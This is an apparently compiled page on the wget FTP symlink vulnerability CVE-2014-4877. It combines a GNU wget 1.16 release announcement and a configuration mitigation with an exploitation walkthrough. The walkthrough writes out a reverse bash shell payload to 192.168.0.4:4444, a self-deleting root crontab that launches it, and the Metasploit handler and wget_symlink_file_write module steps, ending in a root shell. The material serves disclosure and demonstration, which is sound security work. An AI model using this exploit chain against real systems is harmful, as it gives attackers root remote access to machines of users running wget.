Wget FTP Symlink Attack Vulnerability
http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html
[Bug-wget] GNU wget 1.16 released
It is available for download here: ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz and the GPG detached signatures using the key E163E1EA: ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig To reduce load on the main server, you can use this redirector service which automatically redirects you to a mirror: http://ftpmirror.gnu.org/wget/wget-1.16.tar.gz http://ftpmirror.gnu.org/wget/wget-1.16.tar.xz * Noteworthy changes in Wget 1.16 ** No longer create local symbolic links by default. Closes CVE-2014-4877. ** Use libpsl for verifying cookie domains. ** Default progress bar output changed. ** Introduce --show-progress to force display the progress bar. ** Introduce --no-config. The wgetrc files will not be read. ** Introduce --start-pos to allow starting downloads from a specified position. ** Fix a problem with ISA Server Proxy and keep-alive connections.
"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"
Exploitation
We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.
# msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R
0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112
Next we create a crontab file that runs once a minute, launches this command, and deletes itself:
# cat>cronshell <<EOD
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell
EOD
Now we start up msfconsole and configure a shell listener:
# msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash
msf exploit(handler) > set LHOST 192.168.0.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.4:4444
Finally we switch to the wget module itself:
msf exploit(handler) > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell
msf auxiliary(wget_symlink_file_write) > set SRVPORT 21
msf auxiliary(wget_symlink_file_write) > run
[+] Targets should run: $ wget -m ftp://192.168.0.4:21/
[*] Server started.
At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/
[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> RETR cronshell
[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500
msf auxiliary(wget_symlink_file_write) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root) groups=0(root),1001(rvm)